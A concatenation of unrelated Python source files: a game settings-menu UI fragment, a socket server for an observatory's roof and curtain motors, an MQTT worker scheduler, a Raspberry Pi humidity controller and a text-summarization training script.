x_offs4 = x_offs2
x_offs5 = x_offs3
def _b_title(x: float, y: float, button: ba.Widget,
text: Union[str, ba.Lstr]) -> None:
ba.textwidget(parent=self._root_widget,
text=text,
position=(x + basew * 0.47, y + baseh * 0.22),
maxwidth=basew * 0.7,
size=(0, 0),
h_align='center',
v_align='center',
draw_controller=button,
color=(0.7, 0.9, 0.7, 1.0))
ctb = self._controllers_button = ba.buttonwidget(
parent=self._root_widget,
autoselect=True,
position=(x_offs2, v),
size=(basew, baseh),
button_type='square',
label='',
on_activate_call=self._do_controllers)
if ba.app.toolbars and self._back_button is None:
bbtn = _ba.get_special_widget('back_button')
ba.widget(edit=ctb, left_widget=bbtn)
_b_title(x_offs2, v, ctb,
ba.Lstr(resource=self._r + '.controllersText'))
imgw = imgh = 130
ba.imagewidget(parent=self._root_widget,
position=(x_offs2 + basew * 0.49 - imgw * 0.5, v + 35),
size=(imgw, imgh),
texture=ba.gettexture('controllerIcon'),
draw_controller=ctb)
gfxb = self._graphics_button = ba.buttonwidget(
parent=self._root_widget,
autoselect=True,
position=(x_offs3, v),
size=(basew, baseh),
button_type='square',
label='',
on_activate_call=self._do_graphics)
if ba.app.toolbars:
pbtn = _ba.get_special_widget('party_button')
ba.widget(edit=gfxb, up_widget=pbtn, right_widget=pbtn)
_b_title(x_offs3, v, gfxb, ba.Lstr(resource=self._r + '.graphicsText'))
imgw = imgh = 110
ba.imagewidget(parent=self._root_widget,
position=(x_offs3 + basew * 0.49 - imgw * 0.5, v + 42),
size=(imgw, imgh),
texture=ba.gettexture('graphicsIcon'),
draw_controller=gfxb)
v -= (baseh - 5)
abtn = self._audio_button = ba.buttonwidget(
parent=self._root_widget,
autoselect=True,
position=(x_offs4, v),
size=(basew, baseh),
button_type='square',
label='',
on_activate_call=self._do_audio)
_b_title(x_offs4, v, abtn, ba.Lstr(resource=self._r + '.audioText'))
imgw = imgh = 120
ba.imagewidget(parent=self._root_widget,
position=(x_offs4 + basew * 0.49 - imgw * 0.5 + 5,
v + 35),
size=(imgw, imgh),
color=(1, 1, 0),
texture=ba.gettexture('audioIcon'),
draw_controller=abtn)
avb = self._advanced_button = ba.buttonwidget(
parent=self._root_widget,
autoselect=True,
position=(x_offs5, v),
size=(basew, baseh),
button_type='square',
label='',
on_activate_call=self._do_advanced)
_b_title(x_offs5, v, avb, ba.Lstr(resource=self._r + '.advancedText'))
imgw = imgh = 120
ba.imagewidget(parent=self._root_widget,
position=(x_offs5 + basew * 0.49 - imgw * 0.5 + 5,
v + 35),
size=(imgw, imgh),
color=(0.8, 0.95, 1),
texture=ba.gettexture('advancedIcon'),
draw_controller=avb)
@staticmethod
def _preload_modules() -> None:
"""For preloading modules we use in a bg thread to prevent hitches."""
import bastd.ui.mainmenu as _unused1
import bastd.ui.settings.controls as _unused2
import bastd.ui.settings.graphics as _unused3
import bastd.ui.settings.audio as _unused4
import bastd.ui.settings.advanced as _unused5
def _do_back(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.mainmenu import MainMenuWindow
self._save_state()
ba.containerwidget(edit=self._root_widget,
transition=self._transition_out)
ba.app.main_menu_window = (MainMenuWindow(
transition='in_left').get_root_widget())
def _do_controllers(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.settings.controls import ControlsSettingsWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.main_menu_window = (ControlsSettingsWindow(
origin_widget=self._controllers_button).get_root_widget())
def _do_graphics(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.settings.graphics import GraphicsSettingsWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.main_menu_window = (GraphicsSettingsWindow(
origin_widget=self._graphics_button).get_root_widget())
def _do_audio(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.settings.audio import AudioSettingsWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.main_menu_window = (AudioSettingsWindow(
origin_widget=self._audio_button).get_root_widget())
def _do_advanced(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.settings.advanced import AdvancedSettingsWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.main_menu_window = (AdvancedSettingsWindow(
origin_widget=self._advanced_button).get_root_widget())
def _save_state(self) -> None:
try:
sel = self._root_widget.get_selected_child()
if sel == self._controllers_button:
sel_name = 'Controllers'
elif sel == self._graphics_button:
sel_name = 'Graphics'
elif sel == self._audio_button:
sel_name = 'Audio'
elif sel == self._advanced_button:
sel_name = 'Advanced'
elif sel == self._back_button:
sel_name = 'Back'
else:
raise ValueError(f'unrecognized selection \'{sel}\'')
ba.app.window_states[self.__class__.__name__] = {
'sel_name': sel_name
}
except Exception:
ba.print_exception(f'Error saving state for {self}.')
def _restore_state(self) -> None:
try:
sel_name = ba.app.window_states.get(self.__class__.__name__,
{}).get('sel_name')
sel: Optional[ba.Widget]
if sel_name == 'Controllers':
sel = self._controllers_button
elif sel_name == 'Graphics':
sel = self._graphics_button
elif sel_name == 'Audio':
sel = self._audio_button
elif sel_name == 'Advanced':
sel = self._advanced_button
elif sel_name == 'Back':
sel = self._back_button
else:
sel = self._controllers_button
if sel is not None:
ba.containerwidget(edit=self._root_widget, selected_child=sel)
except Exception:
ba.print_exception(f'Error restoring state for {self}.')
|
checker_server.py
|
import getopt
import socket
import sys
from threading import Thread
from gpiozero import RotaryEncoder, OutputDevice, Motor, DigitalInputDevice
from time import sleep
from config import Config
from logger import Logger
def convert_steps(steps):
return f'{steps:04}'
def when_rotated(rotary_encoder):
Logger.getLogger().info(f"Step: %s", rotary_encoder.steps)
def __rotate__(*inputs):
[input.pin.drive_low() for input in inputs]
[input.pin.drive_high() for input in inputs]
def __fake_move_forward__(pin_a, pin_b):
sleep(0.2)
__rotate__(pin_a, pin_b)
Logger.getLogger().debug("Clock Wise")
# curtain.__check_curtains_limit__()
def __fake_move_backward__(pin_a, pin_b):
sleep(0.2)
__rotate__(pin_b, pin_a)
Logger.getLogger().debug("Counter Clock Wise")
# curtain.__check_curtains_limit__()
def __motor_thread__(motor, pin_a, pin_b):
while True:
while motor.is_active:
Logger.getLogger().debug("Motor value = %s", motor.value)
if motor.value == 1:
__fake_move_forward__(pin_a, pin_b)
else:
__fake_move_backward__(pin_a, pin_b)
MOCK: bool = False
HOST: str = Config.getValue("loopback_ip", "server")
PORT: str = Config.getInt("port", "server")
try:
opts, _ = getopt.getopt(sys.argv[1:], "m", ["mock"])
except getopt.GetoptError:
Logger.getLogger().exception("parametri errati")
exit(2) # esce dall'applicazione con errore
for opt, _1 in opts:
if opt in ('-m', '--mock'):
MOCK = True
from gpiozero import Device
from gpiozero.pins.mock import MockFactory
if Device.pin_factory is not None:
Device.pin_factory.reset()
Device.pin_factory = MockFactory()
step_sicurezza = Config.getInt("n_step_sicurezza", "encoder_step")
error_level: int = 0
east_rotary_encoder = RotaryEncoder(
Config.getInt("clk_e", "encoder_board"),
Config.getInt("dt_e", "encoder_board"),
max_steps=step_sicurezza,
wrap=True
)
west_rotary_encoder = RotaryEncoder(
Config.getInt("clk_w", "encoder_board"),
Config.getInt("dt_w", "encoder_board"),
max_steps=step_sicurezza,
wrap=True
)
east_rotary_encoder.steps = 0
west_rotary_encoder.steps = 0
east_rotary_encoder.when_rotated = when_rotated
west_rotary_encoder.when_rotated = when_rotated
motor_roof = OutputDevice(Config.getInt("switch_roof", "roof_board"))
panel_flat = OutputDevice(Config.getInt("switch_panel", "panel_board"))
switch_power_tele = OutputDevice(Config.getInt("switch_power", "panel_board"))
switch_light = OutputDevice(Config.getInt("switch_light", "panel_board"))
switch_aux = OutputDevice(Config.getInt("switch_aux", "panel_board"))
motor_east = Motor(
Config.getInt("motorE_A", "motor_board"),
Config.getInt("motorE_B", "motor_board"),
Config.getInt("motorE_E", "motor_board"),
pwm=False
)
motor_west = Motor(
Config.getInt("motorW_A", "motor_board"),
Config.getInt("motorW_B", "motor_board"),
Config.getInt("motorW_E", "motor_board"),
pwm=False
)
if MOCK:
thread_east = Thread(target=__motor_thread__, args=(motor_east, east_rotary_encoder.a, east_rotary_encoder.b))
thread_east.start()
thread_west = Thread(target=__motor_thread__, args=(motor_west, west_rotary_encoder.a, west_rotary_encoder.b))
thread_west.start()
roof_closed_switch = DigitalInputDevice(Config.getInt("roof_verify_closed", "roof_board"), pull_up=True)
roof_open_switch = DigitalInputDevice(Config.getInt("roof_verify_open", "roof_board"), pull_up=True)
east_curtain_closed = DigitalInputDevice(Config.getInt("curtain_E_verify_closed", "curtains_limit_switch"), pull_up=True)
east_curtain_open = DigitalInputDevice(Config.getInt("curtain_E_verify_open", "curtains_limit_switch"), pull_up=True)
west_curtain_closed = DigitalInputDevice(Config.getInt("curtain_W_verify_closed", "curtains_limit_switch"), pull_up=True)
west_curtain_open = DigitalInputDevice(Config.getInt("curtain_W_verify_open", "curtains_limit_switch"), pull_up=True)
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((HOST, PORT))
s.listen()
Logger.getLogger().info("Server avviato")
while True:
conn, _ = s.accept()
with conn:
while True:
data = conn.recv(7).decode("UTF-8")
Logger.getLogger().debug("Data: %s", data)
if data:
roof = data[0]
panel = data[1]
power_tele = data[2]
light = data[3]
power_ccd = data[4]
curtain_west = data[5]
curtain_east = data[6]
else:
try:
conn.close()
finally:
break
# ROOF
if roof == 'O':
Logger.getLogger().debug("test apertura tetto")
motor_roof.on()
Logger.getLogger().debug("MOTORE TETTO: %s", motor_roof.value)
if roof == 'C':
Logger.getLogger().debug("test chiusura tetto")
motor_roof.off()
Logger.getLogger().debug("MOTORE TETTO: %s", motor_roof.value)
# PANEL FLAT
if panel == 'A':
Logger.getLogger().debug("test accensione pannello flat")
panel_flat.on()
Logger.getLogger().debug("PANEL FLAT: %s", panel_flat.value)
if panel == 'S':
Logger.getLogger().debug("test spegnimento panel flat")
panel_flat.off()
Logger.getLogger().debug("PANEL FLAT: %s", panel_flat.value)
# POWER SWITCH TELE
if power_tele == 'A':
Logger.getLogger().debug("test accensione alimentatore telescopio")
switch_power_tele.on()
Logger.getLogger().debug("ALIMENTATORE TELE: %s", switch_power_tele.value)
if power_tele == 'S':
Logger.getLogger().debug("test spegnimento alimentatore telescopio")
switch_power_tele.off()
Logger.getLogger().debug("ALIMENTATORE TELE: %s", switch_power_tele.value)
# LIGHT
if light == 'A':
Logger.getLogger().debug("test accensioni luci cupola ")
switch_light.on()
Logger.getLogger().debug("LUCI CUPOLA: %s", switch_light.value)
if light == 'S':
Logger.getLogger().debug("test spegnimento luci cupola ")
switch_light.off()
Logger.getLogger().debug("LUCI CUPOLA: %s", switch_light.value)
# POWER SWITCH CCD
if power_ccd == 'A':
Logger.getLogger().debug("test accensione alimentatore CCD ")
switch_aux.on()
Logger.getLogger().debug("ALIMENTATORE CCD: %s", switch_aux.value)
if power_ccd == 'S':
Logger.getLogger().debug("test spegnimento alimentatore CCD ")
switch_aux.off()
Logger.getLogger().debug("ALIMENTATORE CCD: %s", switch_aux.value)
if curtain_west == 'O':
Logger.getLogger().debug("chiamata del metodo per apertura tenda west (automazioneTende.open_all_curtains.curtain_west.open_up) ")
motor_west.forward()
if curtain_west == 'C':
Logger.getLogger().debug("chiamata del metodo per chiusura tenda west (automazioneTende.open_all_curtains.curtain_west.bring_down) ")
motor_west.backward()
if curtain_west == 'S':
Logger.getLogger().debug("metodo per stop tenda west in stand-by ")
motor_west.stop()
if curtain_east == 'O':
Logger.getLogger().debug("chiamata del metodo per apertura tenda east (automazioneTende.open_all_curtains.curtain_east.open_up) ")
motor_east.forward()
if curtain_east == 'C':
Logger.getLogger().debug("chiamata del metodo per chiusura tenda east (automazioneTende.open_all_curtains.curtain_east.bring_down) ")
motor_east.backward()
if curtain_east == 'S':
Logger.getLogger().debug("metodo per stop tenda east in stand-by ")
motor_east.stop()
wa = motor_west.forward_device.value
wb = motor_west.backward_device.value
we = motor_west.enable_device.value
Logger.getLogger().debug("Tenda west A: %s", motor_west.forward_device.value)
Logger.getLogger().debug("Tenda west B: %s", motor_west.backward_device.value)
Logger.getLogger().debug("Tenda west E: %s", motor_west.enable_device.value)
if wa and not wb and we:
curtain_east = "O"
elif not wa and wb and we:
curtain_west = "C"
elif not wa and not wb and not we:
curtain_west = "S"
else:
Exception("ERROR WEST CURTAIN")
ea = motor_east.forward_device.value
eb = motor_east.backward_device.value
ee = motor_east.enable_device.value
Logger.getLogger().debug("Tenda east A: %s", motor_east.forward_device.value)
Logger.getLogger().debug("Tenda east B: %s", motor_east.backward_device.value)
Logger.getLogger().debug("Tenda east E: %s", motor_east.enable_device.value)
if ea and not eb and ee:
curtain_east = "O"
elif not ea and eb and ee:
curtain_east = "C"
elif not ea and not eb and not ee:
curtain_east = "S"
else:
Exception("ERROR EAST CURTAIN")
# verify root status
roof_status = 1 if motor_roof.is_active else 0
# verify motor West status
motor_west_status = 2 if motor_west.value == -1 else motor_west.value
# verify motor East status
motor_east_status = 2 if motor_east.value == -1 else motor_east.value
# verity roof if open or closed
sor = 1 if roof_open_switch.is_active else 0
scr = 1 if roof_closed_switch.is_active else 0
# verity curtain West open or closed
sow = 1 if west_curtain_open.is_active else 0
scw = 1 if west_curtain_closed.is_active else 0
# verity curtain East open or closed
soe = 1 if east_curtain_open.is_active else 0
sce = 1 if east_curtain_closed.is_active else 0
# number step west east
nee = convert_steps(east_rotary_encoder.steps)
nwe = convert_steps(west_rotary_encoder.steps)
panel_status = 1 if panel_flat.is_active else 0
power_tele_status = 1 if switch_power_tele.is_active else 0
light_status = 1 if switch_light.is_active else 0
switch_aux_status = 1 if switch_aux.is_active else 0
test_status = (
str(roof_status) +
str(motor_west_status) +
str(motor_east_status) +
str(sor) + str(scr) +
str(sow) + str(scw) +
str(soe) + str(sce) +
str(nwe) + str(nee) +
str(panel_status) +
str(power_tele_status) +
str(light_status) +
str(switch_aux_status)
)
Logger.getLogger().info("test_status: %s", test_status)
Logger.getLogger().info("Encoder est: %s", nee)
Logger.getLogger().info("Encoder west: %s", nwe)
conn.sendall(test_status.encode("UTF-8"))
except (KeyboardInterrupt, SystemExit) as e:
Logger.getLogger().info("Intercettato CTRL+C: " + str(e))
except Exception as e:
Logger.getLogger().exception("altro errore: " + str(e))
error_level = -1
|
workers_manager.py
|
import importlib
import inspect
import threading
from functools import partial
from apscheduler.schedulers.background import BackgroundScheduler
from interruptingcow import timeout
from pytz import utc
from const import DEFAULT_COMMAND_TIMEOUT, DEFAULT_COMMAND_RETRIES, DEFAULT_UPDATE_RETRIES
from exceptions import WorkerTimeoutError
from workers_queue import _WORKERS_QUEUE
import logger
_LOGGER = logger.get(__name__)
class WorkersManager:
class Command:
def __init__(self, callback, timeout, args=(), options=dict()):
self._callback = callback
self._timeout = timeout
self._args = args
self._options = options
self._source = "{}.{}".format(
callback.__self__.__class__.__name__
if hasattr(callback, "__self__")
else callback.__module__,
callback.__name__,
)
def execute(self):
messages = []
try:
with timeout(
self._timeout,
exception=WorkerTimeoutError(
"Execution of command {} timed out after {} seconds".format(
self._source, self._timeout
)
),
):
if inspect.isgeneratorfunction(self._callback):
for message in self._callback(*self._args):
messages += message
else:
messages = self._callback(*self._args)
except WorkerTimeoutError as e:
if messages:
logger.log_exception(
_LOGGER, "%s, sending only partial update", e, suppress=True
)
else:
raise e
_LOGGER.debug("Execution result of command %s: %s", self._source, messages)
return messages
def __init__(self, config):
self._mqtt_callbacks = []
self._config_commands = []
self._update_commands = []
self._scheduler = BackgroundScheduler(timezone=utc)
self._daemons = []
self._config = config
self._command_timeout = config.get("command_timeout", DEFAULT_COMMAND_TIMEOUT)
self._command_retries = config.get("command_retries", DEFAULT_COMMAND_RETRIES)
self._update_retries = config.get("update_retries", DEFAULT_UPDATE_RETRIES)
def register_workers(self, global_topic_prefix):
for (worker_name, worker_config) in self._config["workers"].items():
module_obj = importlib.import_module("workers.%s" % worker_name)
klass = getattr(module_obj, "%sWorker" % worker_name.title())
command_timeout = worker_config.get(
"command_timeout", self._command_timeout
)
command_retries = worker_config.get(
"command_retries", self._command_retries
)
update_retries = worker_config.get(
"update_retries", self._update_retries
)
worker_obj = klass(
command_timeout, command_retries, update_retries, global_topic_prefix, **worker_config["args"]
)
if "sensor_config" in self._config and hasattr(worker_obj, "config"):
_LOGGER.debug(
"Added %s config with a %d seconds timeout", repr(worker_obj), 2
)
command = self.Command(worker_obj.config, 2, [])
self._config_commands.append(command)
if hasattr(worker_obj, "status_update"):
_LOGGER.debug(
"Added %s worker with %d seconds interval and a %d seconds timeout",
repr(worker_obj),
worker_config["update_interval"],
worker_obj.command_timeout,
)
command = self.Command(
worker_obj.status_update, worker_obj.command_timeout, []
)
self._update_commands.append(command)
if "update_interval" in worker_config:
job_id = "{}_interval_job".format(worker_name)
self._scheduler.add_job(
partial(self._queue_command, command),
"interval",
seconds=worker_config["update_interval"],
id=job_id,
)
self._mqtt_callbacks.append(
(
worker_obj.format_topic("update_interval"),
partial(self._update_interval_wrapper, command, job_id),
)
)
elif hasattr(worker_obj, "run"):
_LOGGER.debug("Registered %s as daemon", repr(worker_obj))
self._daemons.append(worker_obj)
else:
raise "%s cannot be initialized, it has to define run or status_update method" % worker_name
if "topic_subscription" in worker_config:
self._mqtt_callbacks.append(
(
worker_config["topic_subscription"],
partial(self._on_command_wrapper, worker_obj),
)
)
if "topic_subscription" in self._config:
for (callback_name, options) in self._config["topic_subscription"].items():
self._mqtt_callbacks.append(
(
options["topic"],
lambda client, _, c: self._queue_if_matching_payload(
self.Command(
getattr(self, callback_name), self._command_timeout
),
c.payload,
options["payload"],
),
)
)
def start(self, mqtt):
mqtt.callbacks_subscription(self._mqtt_callbacks)
if "sensor_config" in self._config:
self._publish_config(mqtt)
self._scheduler.start()
self.update_all()
for daemon in self._daemons:
threading.Thread(target=daemon.run, args=[mqtt], daemon=True).start()
def _queue_if_matching_payload(self, command, payload, expected_payload):
if payload.decode("utf-8") == expected_payload:
self._queue_command(command)
def update_all(self):
_LOGGER.debug("Updating all workers")
for command in self._update_commands:
self._queue_command(command)
@staticmethod
def _queue_command(command):
_WORKERS_QUEUE.put(command)
def _update_interval_wrapper(self, command, job_id, client, userdata, c):
_LOGGER.info("Recieved updated interval for %s with: %s", c.topic, c.payload)
try:
new_interval = int(c.payload)
self._scheduler.remove_job(job_id)
self._scheduler.add_job(
partial(self._queue_command, command),
"interval",
seconds=new_interval,
id=job_id,
)
except ValueError:
logger.log_exception(
_LOGGER, "Ignoring invalid new interval: %s", c.payload
)
def _on_command_wrapper(self, worker_obj, client, userdata, c):
_LOGGER.debug(
"Received command for %s on %s: %s", repr(worker_obj), c.topic, c.payload
)
global_topic_prefix = userdata["global_topic_prefix"]
topic = (
c.topic[len(global_topic_prefix + "/"):]
if global_topic_prefix is not None
else c.topic
)
self._queue_command(
self.Command(
worker_obj.on_command, worker_obj.command_timeout, [topic, c.payload]
)
)
def _publish_config(self, mqtt):
for command in self._config_commands:
messages = command.execute()
for msg in messages:
msg.topic = "{}/{}".format(
self._config["sensor_config"].get("topic", "homeassistant"),
msg.topic,
)
msg.retain = self._config["sensor_config"].get("retain", True)
mqtt.publish(messages)
|
controller.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import RPi.GPIO as GPIO # Import Raspberry Pi GPIO library
import time,threading
import os
import sys
import Adafruit_DHT
import syslog
from mikezlcd import *
lcd = lcd_module(2004, 25, 24, 22, 18, 17,23)
lcd.disp(0,0,"Booting...")
import psycopg2
try:
f = open("/etc/dbconn.txt", "r")
dsn=f.readline().strip()
SENSORID=f.readline()
f.close()
except:
syslog.syslog("Could not open dbconn.txt")
sys.exit(2)
if dsn!= 'NODB':
CONN = psycopg2.connect(dsn)
CUR=CONN.cursor()
syslog.syslog("Connected to database")
DBWAIT=10*60
else:
syslog.syslog("Not using database")
CONN=None
CUR=None
DBWAIT=0
DHTSENSOR = Adafruit_DHT.DHT22
DHTPIN = 4
BTPIN=7
LEDPIN=8
ONTIME=1200.0
payload=0
lastpush=0
turnofftimer=None
TIMEFORMAT="%Y/%m/%d %H:%M:%S"
DHTWAIT=30
SQL="insert into measure(sensorid,value,type,aux,payload) values(%s,%s,%s,%s,%s)"
lastdb=0
def fmttime(timefloat):
return time.strftime(TIMEFORMAT,time.localtime(timefloat))
def button_callback(channel): # Being run when BTPIN is pulled high
global LEDPIN
global lastpush
global t
now=time.time()
#print(fmttime(now))
if now - lastpush < 1: # Debouching
syslog.syslog("Early push detected")
return
lastpush=now
state=GPIO.input(LEDPIN)
if state==0:
GPIO.output(LEDPIN,GPIO.HIGH)
turnofftimer = threading.Timer(ONTIME, turnoff)
turnofftimer.start()
syslog.syslog("Turned ON")
else:
turnoff()
def handleht(hum,temp,mintemp,maxtemp):
global lcd
global lastdb
global payload
now=time.time()
if DBWAIT > 0 and lastdb+DBWAIT < now:
syslog.syslog("Storing data in DB")
payload+=1
CUR.execute(SQL,(SENSORID,round(hum,2),104,99,payload))
CUR.execute(SQL,(SENSORID,round(temp,2),116,99,payload))
CONN.commit()
lastdb=now
syslog.syslog("Humidity : {:4.1f} %".format(hum))
syslog.syslog("Temperature : {:4.1f} °C".format(temp))
lcd.disp(0,0,"Temp {:5.1f} oC".format(temp))
lcd.disp(0,1," {:5.1f} - {:5.1f}".format(mintemp,maxtemp))
lcd.disp(0,2,"Fukt {:5.1f} %".format(hum))
lcd.disp(0,3,fmttime(now))
def turnoff():
global LEDPIN
syslog.syslog("Turning OFF")
#print(fmttime(time.time()))
GPIO.output(LEDPIN,GPIO.LOW)
if not turnofftimer == None:
turnofftimer.cancel() # Do now want to have a timer hanging around to turn off the led later on.
def readDHT(evt):
global DHTSENSOR
global DHTPIN
global DHTWAIT
mintemp=100
maxtemp=-100
dhtread=0
while True:
if evt.isSet():
return()
now=time.time()
if now-dhtread>DHTWAIT: # Cannot sleep for DHTWAIT as it will stop processing of ev
syslog.syslog("Reading DHT")
dhtread=now
try:
humidity, temperature = Adafruit_DHT.read_retry(DHTSENSOR, DHTPIN)
mintemp=min(mintemp,temperature)
maxtemp=max(maxtemp,temperature)
handleht(humidity,temperature,mintemp,maxtemp)
if evt.isSet():
return()
if humidity>75:
state=GPIO.input(LEDPIN)
if not state==0:
syslog.syslog("Too humid, turning off")
turnoff()
except:
#syslog.syslog(fmttime(time.time()))
syslog.syslog("Problem reading DHT")
pass
time.sleep(1)
GPIO.setwarnings(False) # Ignore warning for now
#GPIO.setmode(GPIO.BOARD) # Use physical pin numbering
GPIO.setup(BTPIN, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) # Set pin 10 to be an input pin and set initial value to be pulled low (off)
GPIO.setup(LEDPIN,GPIO.OUT)
GPIO.output(LEDPIN,GPIO.LOW) # Want to make sure we start in a known state
GPIO.add_event_detect(BTPIN,GPIO.RISING,callback=button_callback) # Setup event on pin 10 rising edge
stopDHT=threading.Event()
DHTthread=threading.Thread(target = readDHT, args = (stopDHT, ))
DHTthread.start()
syslog.syslog("Up running")
while True:
time.sleep(1)
try:
os.remove("/tmp/STOPME")
syslog.syslog("Quitting now")
break
except:
pass
stopDHT.set()
DHTthread.join()
turnoff()
GPIO.cleanup() # Clean up
|
train_hybrid.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
import distributed
from pytorch_transformers import BertTokenizer
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.model_builder import ExtSummarizer, HybridSummarizer
from models.loss import abs_loss
from models.trainer import build_trainer
from models.predictor_copy import build_predictor
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'inter_layers', 'encoder', 'ff_actv', 'use_interval', 'rnn_size']
# symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
# 'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
def train_multi_hybrid(args):
""" Spawns 1 process per GPU """
# 每个gpu生成一个进程
init_logger()
# gpu数量
nb_gpu = args.world_size
# 用spawn方法做多线程
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
# 加入一个新的线程,这个线程跑run函数, device_id是对应的gpu
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
# 让出错处理器监视子线程
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' % gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
# 然后回到训练单个模型的地方
train_single_hybrid(args, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def validate_hybrid(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:3]
# print("????")
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test_hybrid(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test_hybrid(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = HybridSummarizer(args, device, checkpoint)
model.eval()
valid_iter = data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
# tokenizer = BertTokenizer.from_pretrained('/home/ybai/projects/PreSumm/PreSumm/temp/', do_lower_case=True, cache_dir=args.temp_dir)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
valid_loss = abs_loss(model.abstractor.generator, symbols, model.abstractor.vocab_size, device, train=True,
label_smoothing=args.label_smoothing)
trainer = build_trainer(args, device_id, model, None, valid_loss)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test_hybrid(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = HybridSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
# tokenizer = BertTokenizer.from_pretrained('/home/ybai/projects/PreSumm/PreSumm/temp/', do_lower_case=True, cache_dir=args.temp_dir)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, step)
def train_hybrid(args, device_id):
# 是否选择多gpu
if (args.world_size > 1):
train_multi_hybrid(args)
